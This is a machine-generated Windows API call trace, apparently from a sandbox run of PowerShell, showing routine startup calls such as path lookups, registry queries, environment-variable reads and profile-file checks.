	[0571.537] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0571.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x24ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0571.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0571.538] SetErrorMode (uMode=0x1) returned 0x1
	[0571.538] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d150 | out: lpFileInformation=0x24d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0571.538] SetErrorMode (uMode=0x1) returned 0x1
	[0571.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0571.538] SetErrorMode (uMode=0x1) returned 0x1
	[0571.538] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d150 | out: lpFileInformation=0x24d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0571.538] SetErrorMode (uMode=0x1) returned 0x1
	[0571.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0571.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x24ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0571.539] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0571.539] SetErrorMode (uMode=0x1) returned 0x1
	[0571.539] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24d190 | out: lpFileInformation=0x24d190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0571.539] SetErrorMode (uMode=0x1) returned 0x1
	[0571.539] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0571.540] SetErrorMode (uMode=0x1) returned 0x1
	[0571.540] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24d190 | out: lpFileInformation=0x24d190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0571.540] SetErrorMode (uMode=0x1) returned 0x1
	[0571.540] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0571.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x24ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0573.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0573.132] SetErrorMode (uMode=0x1) returned 0x1
	[0573.132] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d190 | out: lpFileInformation=0x24d190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0573.132] SetErrorMode (uMode=0x1) returned 0x1
	[0573.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0573.132] SetErrorMode (uMode=0x1) returned 0x1
	[0573.132] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d190 | out: lpFileInformation=0x24d190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0573.132] SetErrorMode (uMode=0x1) returned 0x1
	[0573.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0573.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x24ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0573.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0573.136] SetErrorMode (uMode=0x1) returned 0x1
	[0573.136] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d450 | out: lpFileInformation=0x24d450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0573.136] SetErrorMode (uMode=0x1) returned 0x1
	[0573.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0573.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0573.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0573.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0574.708] CoTaskMemAlloc (cb=0x804) returned 0x1b9805c0
	[0574.708] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9805c0, nSize=0x24d7b8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d7b8) returned 0x1
	[0574.708] CoTaskMemFree (pv=0x1b9805c0) 
	[0574.708] CoTaskMemAlloc (cb=0x204) returned 0x1394c0
	[0574.708] GetUserNameW (in: lpBuffer=0x1394c0, pcbBuffer=0x24d7f8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d7f8) returned 1
	[0574.709] CoTaskMemFree (pv=0x1394c0) 
	[0574.709] ReportEventW (hEventLog=0x1bbb0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x35c5f48*="Available", lpRawData=0x35c5cd8) returned 1
	[0576.154] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0576.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0576.155] CoTaskMemFree (pv=0x19bc80) 
	[0576.155] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0576.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0576.155] CoTaskMemFree (pv=0x19bc80) 
	[0576.158] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0576.158] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0576.158] CoTaskMemFree (pv=0x19bc80) 
	[0576.158] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0576.158] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0576.158] CoTaskMemFree (pv=0x19bc80) 
	[0576.160] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d7d8 | out: phkResult=0x24d7d8*=0x380) returned 0x0
	[0576.160] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d75c, lpData=0x0, lpcbData=0x24d758*=0x0 | out: lpType=0x24d75c*=0x1, lpData=0x0, lpcbData=0x24d758*=0x56) returned 0x0
	[0576.160] CoTaskMemAlloc (cb=0x5a) returned 0x1b95b840
	[0576.160] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d72c, lpData=0x1b95b840, lpcbData=0x24d728*=0x56 | out: lpType=0x24d72c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d728*=0x56) returned 0x0
	[0576.160] CoTaskMemFree (pv=0x1b95b840) 
	[0576.161] RegCloseKey (hKey=0x380) returned 0x0
	[0576.162] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0576.162] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0576.162] CoTaskMemFree (pv=0x19bc80) 
	[0576.177] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0576.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0576.177] CoTaskMemFree (pv=0x19bc80) 
	[0576.187] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0576.187] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0576.187] CoTaskMemFree (pv=0x19bc80) 
	[0576.188] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0576.188] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0576.188] CoTaskMemFree (pv=0x19bc80) 
	[0576.188] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0576.189] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0576.189] CoTaskMemFree (pv=0x19bc80) 
	[0577.689] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0577.689] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0577.689] CoTaskMemFree (pv=0x19bc80) 
	[0577.690] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0577.690] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0577.690] CoTaskMemFree (pv=0x19bc80) 
	[0577.691] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0577.691] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0577.691] CoTaskMemFree (pv=0x19bc80) 
	[0579.599] CoTaskMemAlloc (cb=0x104) returned 0x19bc80
	[0579.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bc80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0579.600] CoTaskMemFree (pv=0x19bc80) 
	[0581.477] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x19bd90
	[0582.946] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x19bea0
	[0589.819] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0589.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0589.819] CoTaskMemFree (pv=0x19bfb0) 
	[0589.822] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0589.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0589.822] CoTaskMemFree (pv=0x19bfb0) 
	[0591.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0591.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0591.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0591.145] VirtualQuery (in: lpAddress=0x24bae0, lpBuffer=0x24c9a0, dwLength=0x30 | out: lpBuffer=0x24c9a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0591.151] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d938 | out: phkResult=0x24d938*=0x38c) returned 0x0
	[0591.151] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d8bc, lpData=0x0, lpcbData=0x24d8b8*=0x0 | out: lpType=0x24d8bc*=0x1, lpData=0x0, lpcbData=0x24d8b8*=0x56) returned 0x0
	[0591.151] CoTaskMemAlloc (cb=0x5a) returned 0x1b983890
	[0591.151] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d88c, lpData=0x1b983890, lpcbData=0x24d888*=0x56 | out: lpType=0x24d88c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d888*=0x56) returned 0x0
	[0591.151] CoTaskMemFree (pv=0x1b983890) 
	[0591.151] RegCloseKey (hKey=0x38c) returned 0x0
	[0591.152] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d938 | out: phkResult=0x24d938*=0x38c) returned 0x0
	[0591.152] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d8bc, lpData=0x0, lpcbData=0x24d8b8*=0x0 | out: lpType=0x24d8bc*=0x1, lpData=0x0, lpcbData=0x24d8b8*=0x56) returned 0x0
	[0591.152] CoTaskMemAlloc (cb=0x5a) returned 0x1b983890
	[0591.152] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d88c, lpData=0x1b983890, lpcbData=0x24d888*=0x56 | out: lpType=0x24d88c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d888*=0x56) returned 0x0
	[0591.152] CoTaskMemFree (pv=0x1b983890) 
	[0591.152] RegCloseKey (hKey=0x38c) returned 0x0
	[0591.152] CoTaskMemAlloc (cb=0x20c) returned 0x1ac3a0
	[0591.152] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1ac3a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0591.153] CoTaskMemFree (pv=0x1ac3a0) 
	[0591.153] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0591.153] CoTaskMemAlloc (cb=0x20c) returned 0x1ac3a0
	[0591.153] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1ac3a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0591.153] CoTaskMemFree (pv=0x1ac3a0) 
	[0591.153] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0591.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x24d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0591.154] SetErrorMode (uMode=0x1) returned 0x1
	[0591.154] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24d8a0 | out: lpFileInformation=0x24d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0591.154] SetErrorMode (uMode=0x1) returned 0x1
	[0591.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x24d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0591.154] SetErrorMode (uMode=0x1) returned 0x1
	[0591.154] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24d8a0 | out: lpFileInformation=0x24d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0591.154] SetErrorMode (uMode=0x1) returned 0x1
	[0591.154] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x24d690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0591.154] SetErrorMode (uMode=0x1) returned 0x1
	[0591.154] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24d8a0 | out: lpFileInformation=0x24d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0591.154] SetErrorMode (uMode=0x1) returned 0x1
	[0591.155] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x24d690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0591.155] SetErrorMode (uMode=0x1) returned 0x1
	[0591.155] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24d8a0 | out: lpFileInformation=0x24d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0591.155] SetErrorMode (uMode=0x1) returned 0x1
	[0591.155] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0591.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0591.155] CoTaskMemFree (pv=0x19bfb0) 
	[0591.156] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0591.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0591.156] CoTaskMemFree (pv=0x19bfb0) 
	[0591.156] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0591.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0591.156] CoTaskMemFree (pv=0x19bfb0) 
	[0591.157] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0591.157] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0591.157] CoTaskMemFree (pv=0x19bfb0) 
	[0591.157] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0591.157] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0591.157] CoTaskMemFree (pv=0x19bfb0) 
	[0591.158] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0591.158] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0591.158] CoTaskMemFree (pv=0x19bfb0) 
	[0591.160] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0591.160] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x24da80 | out: lpMode=0x24da80) returned 1
	[0591.161] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0591.161] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0591.161] CoTaskMemFree (pv=0x19bfb0) 
	[0591.164] SetEvent (hEvent=0x308) returned 1
	[0591.164] SetEvent (hEvent=0x38c) returned 1
	[0591.164] SetEvent (hEvent=0x2f0) returned 1
	[0591.164] SetEvent (hEvent=0x2f4) returned 1
	[0591.166] CoTaskMemAlloc (cb=0x104) returned 0x19bfb0
	[0591.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19bfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0591.166] CoTaskMemFree (pv=0x19bfb0) 
	[0591.167] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d7d8 | out: phkResult=0x24d7d8*=0x34c) returned 0x0
	[0591.167] RegQueryValueExW (in: hKey=0x34c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x24d75c, lpData=0x0, lpcbData=0x24d758*=0x0 | out: lpType=0x24d75c*=0x0, lpData=0x0, lpcbData=0x24d758*=0x0) returned 0x2

Thread:
	id = 274
	os_tid = 0xdc8
